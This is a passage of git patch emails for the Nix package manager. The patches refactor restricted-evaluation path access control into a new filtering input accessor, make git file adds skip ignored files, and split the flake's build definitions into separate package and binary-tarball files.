path); throw; @@ -1493,7 +1486,7 @@ static void prim_storePath(EvalState & state, const PosIdx pos, Value * * args, })); NixStringContext context; - auto path = state.checkSourcePath(state.coerceToPath(pos, *args[0], context, "while evaluating the first argument passed to 'builtins.storePath'")).path; + auto path = state.coerceToPath(pos, *args[0], context, "while evaluating the first argument passed to 'builtins.storePath'").path; /* Resolve symlinks in ‘path’, unless ‘path’ itself is a symlink directly in the store. The latter condition is necessary so e.g. nix-push does the right thing. 
*/ @@ -1535,12 +1528,7 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args, { auto & arg = *args[0]; - /* We don’t check the path right now, because we don’t want to - throw if the path isn’t allowed, but just return false (and we - can’t just catch the exception here because we still want to - throw if something in the evaluation of `arg` tries to - access an unauthorized path). */ - auto path = realisePath(state, pos, arg, { .checkForPureEval = false }); + auto path = realisePath(state, pos, arg); /* SourcePath doesn't know about trailing slash. */ auto mustBeDir = arg.type() == nString @@ -1548,14 +1536,9 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args, || arg.string_view().ends_with("/.")); try { - auto checked = state.checkSourcePath(path); - auto st = checked.maybeLstat(); + auto st = path.maybeLstat(); auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory); v.mkBool(exists); - } catch (SysError & e) { - /* Don't give away info from errors while canonicalising - ‘path’ in restricted mode. */ - v.mkBool(false); } catch (RestrictedPathError & e) { v.mkBool(false); } @@ -1699,7 +1682,7 @@ static void prim_findFile(EvalState & state, const PosIdx pos, Value * * args, V auto path = state.forceStringNoCtx(*args[1], pos, "while evaluating the second argument passed to builtins.findFile"); - v.mkPath(state.checkSourcePath(state.findFile(searchPath, path, pos))); + v.mkPath(state.findFile(searchPath, path, pos)); } static RegisterPrimOp primop_findFile(PrimOp { @@ -2178,11 +2161,35 @@ static RegisterPrimOp primop_toFile({ .fun = prim_toFile, }); +bool EvalState::callPathFilter( + Value * filterFun, + const SourcePath & path, + std::string_view pathArg, + PosIdx pos) +{ + auto st = path.lstat(); + + /* Call the filter function. The first argument is the path, the + second is a string indicating the type of the file. 
*/ + Value arg1; + arg1.mkString(pathArg); + + Value arg2; + // assert that type is not "unknown" + arg2.mkString(fileTypeToString(st.type)); + + Value * args []{&arg1, &arg2}; + Value res; + callFunction(*filterFun, 2, args, res, pos); + + return forceBool(res, pos, "while evaluating the return value of the path filter function"); +} + static void addPath( EvalState & state, const PosIdx pos, std::string_view name, - Path path, + SourcePath path, Value * filterFun, FileIngestionMethod method, const std::optional expectedHash, @@ -2190,48 +2197,29 @@ static void addPath( const NixStringContext & context) { try { - // FIXME: handle CA derivation outputs (where path needs to - // be rewritten to the actual output). - auto rewrites = state.realiseContext(context); - path = state.toRealPath(rewriteStrings(path, rewrites), context); - StorePathSet refs; - if (state.store->isInStore(path)) { + if (path.accessor == state.rootFS && state.store->isInStore(path.path.abs())) { + // FIXME: handle CA derivation outputs (where path needs to + // be rewritten to the actual output). + auto rewrites = state.realiseContext(context); + path = {state.rootFS, CanonPath(state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context))}; + try { - auto [storePath, subPath] = state.store->toStorePath(path); + auto [storePath, subPath] = state.store->toStorePath(path.path.abs()); // FIXME: we should scanForReferences on the path before adding it refs = state.store->queryPathInfo(storePath)->references; - path = state.store->toRealPath(storePath) + subPath; + path = {state.rootFS, CanonPath(state.store->toRealPath(storePath) + subPath)}; } catch (Error &) { // FIXME: should be InvalidPathError } } - path = evalSettings.pureEval && expectedHash - ? path - : state.checkSourcePath(state.rootPath(CanonPath(path))).path.abs(); - - PathFilter filter = filterFun ? ([&](const Path & path) { - auto st = lstat(path); - - /* Call the filter function. 
The first argument is the path, - the second is a string indicating the type of the file. */ - Value arg1; - arg1.mkString(path); - - Value arg2; - arg2.mkString( - S_ISREG(st.st_mode) ? "regular" : - S_ISDIR(st.st_mode) ? "directory" : - S_ISLNK(st.st_mode) ? "symlink" : - "unknown" /* not supported, will fail! */); - - Value * args []{&arg1, &arg2}; - Value res; - state.callFunction(*filterFun, 2, args, res, pos); - - return state.forceBool(res, pos, "while evaluating the return value of the path filter function"); - }) : defaultPathFilter; + std::unique_ptr filter; + if (filterFun) + filter = std::make_unique([&](const Path & p) { + auto p2 = CanonPath(p); + return state.callPathFilter(filterFun, {path.accessor, p2}, p2.abs(), pos); + }); std::optional expectedStorePath; if (expectedHash) @@ -2242,7 +2230,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = state.rootPath(CanonPath(path)).fetchToStore(state.store, name, method, &filter, state.repair); + auto dstPath = path.fetchToStore(state.store, name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); @@ -2261,7 +2249,8 @@ static void prim_filterSource(EvalState & state, const PosIdx pos, Value * * arg auto path = state.coerceToPath(pos, *args[1], context, "while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'"); state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.filterSource"); - addPath(state, pos, path.baseName(), path.path.abs(), args[0], FileIngestionMethod::Recursive, std::nullopt, v, context); + + addPath(state, pos, path.baseName(), path, args[0], FileIngestionMethod::Recursive, std::nullopt, v, context); } static RegisterPrimOp primop_filterSource({ @@ -2356,7 +2345,7 @@ 
static void prim_path(EvalState & state, const PosIdx pos, Value * * args, Value if (name.empty()) name = path->baseName(); - addPath(state, pos, name, path->path.abs(), filterFun, method, expectedHash, v, context); + addPath(state, pos, name, *path, filterFun, method, expectedHash, v, context); } static RegisterPrimOp primop_path({ diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 75ce12a8c..e2986bfe0 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -310,8 +310,11 @@ static void main_nix_build(int argc, char * * argv) else /* If we're in a #! script, interpret filenames relative to the script. */ - exprs.push_back(state->parseExprFromFile(resolveExprPath(state->checkSourcePath(lookupFileArg(*state, - inShebang && !packages ? absPath(i, absPath(dirOf(script))) : i))))); + exprs.push_back( + state->parseExprFromFile( + resolveExprPath( + lookupFileArg(*state, + inShebang && !packages ? absPath(i, absPath(dirOf(script))) : i)))); } } diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index c67409e89..86b9be17d 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -183,7 +183,7 @@ static int main_nix_instantiate(int argc, char * * argv) for (auto & i : files) { Expr * e = fromArgs ? state->parseExprFromString(i, state->rootPath(CanonPath::fromCwd())) - : state->parseExprFromFile(resolveExprPath(state->checkSourcePath(lookupFileArg(*state, i)))); + : state->parseExprFromFile(resolveExprPath(lookupFileArg(*state, i))); processExpr(*state, attrPaths, parseOnly, strict, autoArgs, evalOnly, outputKind, xmlOutputSourceLocation, e); } diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index 197ae7a10..b8deceacc 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -14,8 +14,8 @@ nix-instantiate --restrict-eval --eval -E 'builtins.readFile ./simple.nix' -I sr (! 
nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel') nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel' -I src=../../src -(! nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in ') -nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in ' -I src=. +(! nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ') +nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ' -I src=. p=$(nix eval --raw --expr "builtins.fetchurl file://$(pwd)/restricted.sh" --impure --restrict-eval --allowed-uris "file://$(pwd)") cmp $p restricted.sh From 305939655a6cd680997981ca6077d4ce7f957984 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 16:28:33 +0100 Subject: [PATCH 012/654] Remove superfluous use of hasAccessControl() --- src/libexpr/primops.cc | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 0f7706563..c442de986 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -91,9 +91,8 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & [outputName, outputPath] : outputs) { /* Add the output of this derivations to the allowed paths. 
*/ - if (rootFS->hasAccessControl()) { - allowPath(store->toRealPath(outputPath)); - } + allowPath(store->toRealPath(outputPath)); + /* Get all the output paths corresponding to the placeholders we had */ if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations)) { res.insert_or_assign( From 43d9fb6cf180c421be17b4247f5dd032cf4843f5 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 16:44:54 +0100 Subject: [PATCH 013/654] Remove InputAccessor::root() --- src/libexpr/value.hh | 7 +++---- src/libfetchers/fetchers.cc | 2 +- src/libfetchers/input-accessor.cc | 7 +------ src/libfetchers/input-accessor.hh | 7 +++++-- 4 files changed, 10 insertions(+), 13 deletions(-) diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index bcff8ae55..72a3a2b32 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -424,10 +424,9 @@ public: SourcePath path() const { assert(internalType == tPath); - return SourcePath { - .accessor = ref(_path.accessor->shared_from_this()), - .path = CanonPath(CanonPath::unchecked_t(), _path.path) - }; + return SourcePath( + ref(_path.accessor->shared_from_this()), + CanonPath(CanonPath::unchecked_t(), _path.path)); } std::string_view string_view() const diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index 60208619e..5fd9e069f 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -374,7 +374,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const std::pair InputScheme::fetch(ref store, const Input & input) { auto [accessor, input2] = getAccessor(store, input); - auto storePath = accessor->root().fetchToStore(store, input2.getName()); + auto storePath = SourcePath(accessor).fetchToStore(store, input2.getName()); return {storePath, input2}; } diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc index 85dc4609f..f54a5a6fd 100644 --- a/src/libfetchers/input-accessor.cc +++ b/src/libfetchers/input-accessor.cc @@ -53,11 +53,6 @@ 
StorePath InputAccessor::fetchToStore( return storePath; } -SourcePath InputAccessor::root() -{ - return {ref(shared_from_this()), CanonPath::root}; -} - std::ostream & operator << (std::ostream & str, const SourcePath & path) { str << path.to_string(); @@ -88,7 +83,7 @@ SourcePath SourcePath::parent() const SourcePath SourcePath::resolveSymlinks() const { - auto res = accessor->root(); + auto res = SourcePath(accessor); int linksAllowed = 1024; diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh index 26d17f064..d5ac238b1 100644 --- a/src/libfetchers/input-accessor.hh +++ b/src/libfetchers/input-accessor.hh @@ -36,8 +36,6 @@ struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this accessor; CanonPath path; + SourcePath(ref accessor, CanonPath path = CanonPath::root) + : accessor(std::move(accessor)) + , path(std::move(path)) + { } + std::string_view baseName() const; /** From be30c2ea8de7f12d610b695bd7c6edf22b32fe55 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 8 Nov 2023 17:52:22 -0800 Subject: [PATCH 014/654] Don't attempt to `git add` ignored files This uses `git check-ignore` to determine if files are ignored before attempting to add them in `putFile`. We also add a condition to the `fetchFromWorkdir` filter to always add the `flake.lock` file, even if it's not tracked. This is necessary to resolve inputs. This fixes #8854 without `git add --force`. 
--- src/libfetchers/git.cc | 25 ++++++++++++++++++------- 1 file changed, 18 insertions(+), 7 deletions(-) diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 8cd74057c..734c29258 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -313,15 +313,26 @@ struct GitInputScheme : InputScheme writeFile((CanonPath(repoInfo.url) + path).abs(), contents); - runProgram("git", true, - { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "add", "--intent-to-add", "--", std::string(path.rel()) }); + auto result = runProgram(RunOptions { + .program = "git", + .args = {"-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "check-ignore", "--quiet", std::string(path.rel())}, + }); + auto exitCode = WEXITSTATUS(result.first); - // Pause the logger to allow for user input (such as a gpg passphrase) in `git commit` - logger->pause(); - Finally restoreLogger([]() { logger->resume(); }); - if (commitMsg) + if (exitCode != 0) { + // The path is not `.gitignore`d, we can add the file. 
runProgram("git", true, - { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "commit", std::string(path.rel()), "-m", *commitMsg }); + { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "add", "--intent-to-add", "--", std::string(path.rel()) }); + + + if (commitMsg) { + // Pause the logger to allow for user input (such as a gpg passphrase) in `git commit` + logger->pause(); + Finally restoreLogger([]() { logger->resume(); }); + runProgram("git", true, + { "-C", repoInfo.url, "--git-dir", repoInfo.gitDir, "commit", std::string(path.rel()), "-m", *commitMsg }); + } + } } struct RepoInfo From 8cafc754d845529a78595d1196769257ee23ca56 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 21:54:53 +0100 Subject: [PATCH 015/654] Move access control from FSInputAccessor to FilteringInputAccessor --- src/libexpr/eval.cc | 23 +++--- src/libexpr/eval.hh | 3 +- src/libfetchers/filtering-input-accessor.cc | 83 +++++++++++++++++++++ src/libfetchers/filtering-input-accessor.hh | 73 ++++++++++++++++++ src/libfetchers/fs-input-accessor.cc | 77 +++---------------- src/libfetchers/fs-input-accessor.hh | 22 +----- src/libfetchers/git.cc | 6 +- 7 files changed, 191 insertions(+), 96 deletions(-) create mode 100644 src/libfetchers/filtering-input-accessor.cc create mode 100644 src/libfetchers/filtering-input-accessor.hh diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 23ac349fe..841c223cd 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -14,6 +14,7 @@ #include "profiles.hh" #include "print.hh" #include "fs-input-accessor.hh" +#include "filtering-input-accessor.hh" #include "memory-input-accessor.hh" #include "signals.hh" #include "gc-small-vector.hh" @@ -510,17 +511,15 @@ EvalState::EvalState( , repair(NoRepair) , emptyBindings(0) , rootFS( - makeFSInputAccessor( - CanonPath::root, - evalSettings.restrictEval || evalSettings.pureEval - ? std::optional>(std::set()) - : std::nullopt, + evalSettings.restrictEval || evalSettings.pureEval + ? 
ref(AllowListInputAccessor::create(makeFSInputAccessor(CanonPath::root), {}, [](const CanonPath & path) -> RestrictedPathError { auto modeInformation = evalSettings.pureEval ? "in pure evaluation mode (use '--impure' to override)" : "in restricted mode"; throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", path, modeInformation); })) + : makeFSInputAccessor(CanonPath::root)) , corepkgsFS(makeMemoryInputAccessor()) , internalFS(makeMemoryInputAccessor()) , derivationInternal{corepkgsFS->addFile( @@ -563,7 +562,7 @@ EvalState::EvalState( } /* Allow access to all paths in the search path. */ - if (rootFS->hasAccessControl()) + if (rootFS.dynamic_pointer_cast()) for (auto & i : searchPath.elements) resolveSearchPathPath(i.path, true); @@ -583,12 +582,14 @@ EvalState::~EvalState() void EvalState::allowPath(const Path & path) { - rootFS->allowPath(CanonPath(path)); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->allowPath(CanonPath(path)); } void EvalState::allowPath(const StorePath & storePath) { - rootFS->allowPath(CanonPath(store->toRealPath(storePath))); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->allowPath(CanonPath(store->toRealPath(storePath))); } void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v) @@ -617,12 +618,14 @@ void EvalState::checkURI(const std::string & uri) /* If the URI is a path, then check it against allowedPaths as well. 
*/ if (hasPrefix(uri, "/")) { - rootFS->checkAllowed(CanonPath(uri)); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->checkAccess(CanonPath(uri)); return; } if (hasPrefix(uri, "file://")) { - rootFS->checkAllowed(CanonPath(uri.substr(7))); + if (auto rootFS2 = rootFS.dynamic_pointer_cast()) + rootFS2->checkAccess(CanonPath(uri.substr(7))); return; } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index ee7bdda0d..f3f6d35b9 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -30,7 +30,6 @@ class EvalState; class StorePath; struct SingleDerivedPath; enum RepairFlag : bool; -struct FSInputAccessor; struct MemoryInputAccessor; @@ -222,7 +221,7 @@ public: /** * The accessor for the root filesystem. */ - const ref rootFS; + const ref rootFS; /** * The in-memory filesystem for paths. diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc new file mode 100644 index 000000000..5ae416fd3 --- /dev/null +++ b/src/libfetchers/filtering-input-accessor.cc @@ -0,0 +1,83 @@ +#include "filtering-input-accessor.hh" + +namespace nix { + +std::string FilteringInputAccessor::readFile(const CanonPath & path) +{ + checkAccess(path); + return next->readFile(prefix + path); +} + +bool FilteringInputAccessor::pathExists(const CanonPath & path) +{ + return isAllowed(path) && next->pathExists(prefix + path); +} + +std::optional FilteringInputAccessor::maybeLstat(const CanonPath & path) +{ + checkAccess(path); + return next->maybeLstat(prefix + path); +} + +InputAccessor::DirEntries FilteringInputAccessor::readDirectory(const CanonPath & path) +{ + checkAccess(path); + DirEntries entries; + for (auto & entry : next->readDirectory(prefix + path)) { + if (isAllowed(path + entry.first)) + entries.insert(std::move(entry)); + } + return entries; +} + +std::string FilteringInputAccessor::readLink(const CanonPath & path) +{ + checkAccess(path); + return next->readLink(prefix + path); +} + +std::string 
FilteringInputAccessor::showPath(const CanonPath & path) +{ + return next->showPath(prefix + path); +} + +void FilteringInputAccessor::checkAccess(const CanonPath & path) +{ + if (!isAllowed(path)) + throw makeNotAllowedError + ? makeNotAllowedError(path) + : RestrictedPathError("access to path '%s' is forbidden", showPath(path)); +} + +struct AllowListInputAccessorImpl : AllowListInputAccessor +{ + std::set allowedPaths; + + AllowListInputAccessorImpl( + ref next, + std::set && allowedPaths, + MakeNotAllowedError && makeNotAllowedError) + : AllowListInputAccessor(SourcePath(next), std::move(makeNotAllowedError)) + , allowedPaths(std::move(allowedPaths)) + { } + + bool isAllowed(const CanonPath & path) override + { + return path.isAllowed(allowedPaths); + } + + void allowPath(CanonPath path) override + { + allowedPaths.insert(std::move(path)); + } +}; + +ref AllowListInputAccessor::create( + ref next, + std::set && allowedPaths, + MakeNotAllowedError && makeNotAllowedError) +{ + return make_ref(next, std::move(allowedPaths), std::move(makeNotAllowedError)); +} + +} diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh new file mode 100644 index 000000000..209d26974 --- /dev/null +++ b/src/libfetchers/filtering-input-accessor.hh @@ -0,0 +1,73 @@ +#pragma once + +#include "input-accessor.hh" + +namespace nix { + +/** + * A function that should throw an exception of type + * `RestrictedPathError` explaining that access to `path` is + * forbidden. + */ +typedef std::function MakeNotAllowedError; + +/** + * An abstract wrapping `InputAccessor` that performs access + * control. Subclasses should override `checkAccess()` to implement an + * access control policy. 
+ */ +struct FilteringInputAccessor : InputAccessor +{ + ref next; + CanonPath prefix; + MakeNotAllowedError makeNotAllowedError; + + FilteringInputAccessor(const SourcePath & src, MakeNotAllowedError && makeNotAllowedError) + : next(src.accessor) + , prefix(src.path) + , makeNotAllowedError(std::move(makeNotAllowedError)) + { } + + std::string readFile(const CanonPath & path) override; + + bool pathExists(const CanonPath & path) override; + + std::optional maybeLstat(const CanonPath & path) override; + + DirEntries readDirectory(const CanonPath & path) override; + + std::string readLink(const CanonPath & path) override; + + std::string showPath(const CanonPath & path) override; + + /** + * Call `makeNotAllowedError` to throw a `RestrictedPathError` + * exception if `isAllowed()` returns `false` for `path`. + */ + void checkAccess(const CanonPath & path); + + /** + * Return `true` iff access to path is allowed. + */ + virtual bool isAllowed(const CanonPath & path) = 0; +}; + +/** + * A wrapping `InputAccessor` that checks paths against an allow-list. + */ +struct AllowListInputAccessor : public FilteringInputAccessor +{ + /** + * Grant access to the specified path. 
+ */ + virtual void allowPath(CanonPath path) = 0; + + static ref create( + ref next, + std::set && allowedPaths, + MakeNotAllowedError && makeNotAllowedError); + + using FilteringInputAccessor::FilteringInputAccessor; +}; + +} diff --git a/src/libfetchers/fs-input-accessor.cc b/src/libfetchers/fs-input-accessor.cc index 2efee932d..c3d8d273c 100644 --- a/src/libfetchers/fs-input-accessor.cc +++ b/src/libfetchers/fs-input-accessor.cc @@ -4,19 +4,12 @@ namespace nix { -struct FSInputAccessorImpl : FSInputAccessor, PosixSourceAccessor +struct FSInputAccessor : InputAccessor, PosixSourceAccessor { CanonPath root; - std::optional> allowedPaths; - MakeNotAllowedError makeNotAllowedError; - FSInputAccessorImpl( - const CanonPath & root, - std::optional> && allowedPaths, - MakeNotAllowedError && makeNotAllowedError) + FSInputAccessor(const CanonPath & root) : root(root) - , allowedPaths(std::move(allowedPaths)) - , makeNotAllowedError(std::move(makeNotAllowedError)) { displayPrefix = root.isRoot() ? 
"" : root.abs(); } @@ -27,39 +20,30 @@ struct FSInputAccessorImpl : FSInputAccessor, PosixSourceAccessor std::function sizeCallback) override { auto absPath = makeAbsPath(path); - checkAllowed(absPath); PosixSourceAccessor::readFile(absPath, sink, sizeCallback); } bool pathExists(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - return isAllowed(absPath) && PosixSourceAccessor::pathExists(absPath); + return PosixSourceAccessor::pathExists(makeAbsPath(path)); } std::optional maybeLstat(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - checkAllowed(absPath); - return PosixSourceAccessor::maybeLstat(absPath); + return PosixSourceAccessor::maybeLstat(makeAbsPath(path)); } DirEntries readDirectory(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - checkAllowed(absPath); DirEntries res; - for (auto & entry : PosixSourceAccessor::readDirectory(absPath)) - if (isAllowed(absPath + entry.first)) - res.emplace(entry); + for (auto & entry : PosixSourceAccessor::readDirectory(makeAbsPath(path))) + res.emplace(entry); return res; } std::string readLink(const CanonPath & path) override { - auto absPath = makeAbsPath(path); - checkAllowed(absPath); - return PosixSourceAccessor::readLink(absPath); + return PosixSourceAccessor::readLink(makeAbsPath(path)); } CanonPath makeAbsPath(const CanonPath & path) @@ -67,59 +51,22 @@ struct FSInputAccessorImpl : FSInputAccessor, PosixSourceAccessor return root + path; } - void checkAllowed(const CanonPath & absPath) override - { - if (!isAllowed(absPath)) - throw makeNotAllowedError - ? 
makeNotAllowedError(absPath) - : RestrictedPathError("access to path '%s' is forbidden", absPath); - } - - bool isAllowed(const CanonPath & absPath) - { - if (!absPath.isWithin(root)) - return false; - - if (allowedPaths) { - auto p = absPath.removePrefix(root); - if (!p.isAllowed(*allowedPaths)) - return false; - } - - return true; - } - - void allowPath(CanonPath path) override - { - if (allowedPaths) - allowedPaths->insert(std::move(path)); - } - - bool hasAccessControl() override - { - return (bool) allowedPaths; - } - std::optional getPhysicalPath(const CanonPath & path) override { return makeAbsPath(path); } }; -ref makeFSInputAccessor( - const CanonPath & root, - std::optional> && allowedPaths, - MakeNotAllowedError && makeNotAllowedError) +ref makeFSInputAccessor(const CanonPath & root) { - return make_ref(root, std::move(allowedPaths), std::move(makeNotAllowedError)); + return make_ref(root); } -ref makeStorePathAccessor( +ref makeStorePathAccessor( ref store, - const StorePath & storePath, - MakeNotAllowedError && makeNotAllowedError) + const StorePath & storePath) { - return makeFSInputAccessor(CanonPath(store->toRealPath(storePath)), {}, std::move(makeNotAllowedError)); + return makeFSInputAccessor(CanonPath(store->toRealPath(storePath))); } SourcePath getUnfilteredRootPath(CanonPath path) diff --git a/src/libfetchers/fs-input-accessor.hh b/src/libfetchers/fs-input-accessor.hh index 19a5211c8..ba5af5887 100644 --- a/src/libfetchers/fs-input-accessor.hh +++ b/src/libfetchers/fs-input-accessor.hh @@ -7,26 +7,12 @@ namespace nix { class StorePath; class Store; -struct FSInputAccessor : InputAccessor -{ - virtual void checkAllowed(const CanonPath & absPath) = 0; +ref makeFSInputAccessor( + const CanonPath & root); - virtual void allowPath(CanonPath path) = 0; - - virtual bool hasAccessControl() = 0; -}; - -typedef std::function MakeNotAllowedError; - -ref makeFSInputAccessor( - const CanonPath & root, - std::optional> && allowedPaths = {}, - 
MakeNotAllowedError && makeNotAllowedError = {}); - -ref makeStorePathAccessor( +ref makeStorePathAccessor( ref store, - const StorePath & storePath, - MakeNotAllowedError && makeNotAllowedError = {}); + const StorePath & storePath); SourcePath getUnfilteredRootPath(CanonPath path); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 8cd74057c..ff4b1e823 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -9,6 +9,7 @@ #include "processes.hh" #include "git.hh" #include "fs-input-accessor.hh" +#include "filtering-input-accessor.hh" #include "mounted-input-accessor.hh" #include "git-utils.hh" #include "logging.hh" @@ -639,7 +640,10 @@ struct GitInputScheme : InputScheme repoInfo.workdirInfo.files.insert(submodule.path); ref accessor = - makeFSInputAccessor(CanonPath(repoInfo.url), repoInfo.workdirInfo.files, makeNotAllowedError(repoInfo.url)); + AllowListInputAccessor::create( + makeFSInputAccessor(CanonPath(repoInfo.url)), + std::move(repoInfo.workdirInfo.files), + makeNotAllowedError(repoInfo.url)); /* If the repo has submodules, return a mounted input accessor consisting of the accessor for the top-level repo and the From c982198485a995d40b01b8caf62df5458046614d Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 30 Nov 2023 22:48:44 +0000 Subject: [PATCH 016/654] First step --- binary-tarball.nix | 81 ++++++++++++++ flake.nix | 262 +++++++++++++-------------------------------- lowdown.nix | 22 ++++ package.nix | 239 +++++++++++++++++++++++++++++++++++++++++ 4 files changed, 415 insertions(+), 189 deletions(-) create mode 100644 binary-tarball.nix create mode 100644 lowdown.nix create mode 100644 package.nix diff --git a/binary-tarball.nix b/binary-tarball.nix new file mode 100644 index 000000000..1fa185519 --- /dev/null +++ b/binary-tarball.nix @@ -0,0 +1,81 @@ +{ runCommand +, version +, system +, nix +, cacert +}: + +let + + installerClosureInfo = buildPackages.closureInfo { + rootPaths = [ nix cacert ]; + }; + + env = { + 
meta.description = "Distribution-independent Nix bootstrap binaries for ${system}"; + }; + +in + +runCommand "nix-binary-tarball-${version}" env '' + cp ${installerClosureInfo}/registration $TMPDIR/reginfo + cp ${./scripts/create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh + substitute ${./scripts/install-nix-from-closure.sh} $TMPDIR/install \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + + substitute ${./scripts/install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + substitute ${./scripts/install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + substitute ${./scripts/install-multi-user.sh} $TMPDIR/install-multi-user \ + --subst-var-by nix ${nix} \ + --subst-var-by cacert ${cacert} + + if type -p shellcheck; then + # SC1090: Don't worry about not being able to find + # $nix/etc/profile.d/nix.sh + shellcheck --exclude SC1090 $TMPDIR/install + shellcheck $TMPDIR/create-darwin-volume.sh + shellcheck $TMPDIR/install-darwin-multi-user.sh + shellcheck $TMPDIR/install-systemd-multi-user.sh + + # SC1091: Don't panic about not being able to source + # /etc/profile + # SC2002: Ignore "useless cat" "error", when loading + # .reginfo, as the cat is a much cleaner + # implementation, even though it is "useless" + # SC2116: Allow ROOT_HOME=$(echo ~root) for resolving + # root's home directory + shellcheck --external-sources \ + --exclude SC1091,SC2002,SC2116 $TMPDIR/install-multi-user + fi + + chmod +x $TMPDIR/install + chmod +x $TMPDIR/create-darwin-volume.sh + chmod +x $TMPDIR/install-darwin-multi-user.sh + chmod +x $TMPDIR/install-systemd-multi-user.sh + chmod +x $TMPDIR/install-multi-user + dir=nix-${version}-${system} + fn=$out/$dir.tar.xz + mkdir -p $out/nix-support + echo "file binary-dist $fn" >> $out/nix-support/hydra-build-products + tar cvfJ $fn \ + --owner=0 --group=0 
--mode=u+rw,uga+r \ + --mtime='1970-01-01' \ + --absolute-names \ + --hard-dereference \ + --transform "s,$TMPDIR/install,$dir/install," \ + --transform "s,$TMPDIR/create-darwin-volume.sh,$dir/create-darwin-volume.sh," \ + --transform "s,$TMPDIR/reginfo,$dir/.reginfo," \ + --transform "s,$NIX_STORE,$dir/store,S" \ + $TMPDIR/install \ + $TMPDIR/create-darwin-volume.sh \ + $TMPDIR/install-darwin-multi-user.sh \ + $TMPDIR/install-systemd-multi-user.sh \ + $TMPDIR/install-multi-user \ + $TMPDIR/reginfo \ + $(cat ${installerClosureInfo}/store-paths) +'' diff --git a/flake.nix b/flake.nix index 33673575b..a1fc1cd1c 100644 --- a/flake.nix +++ b/flake.nix @@ -7,7 +7,7 @@ inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; - outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, flake-compat, libgit2 }: + outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2 }: let inherit (nixpkgs) lib; 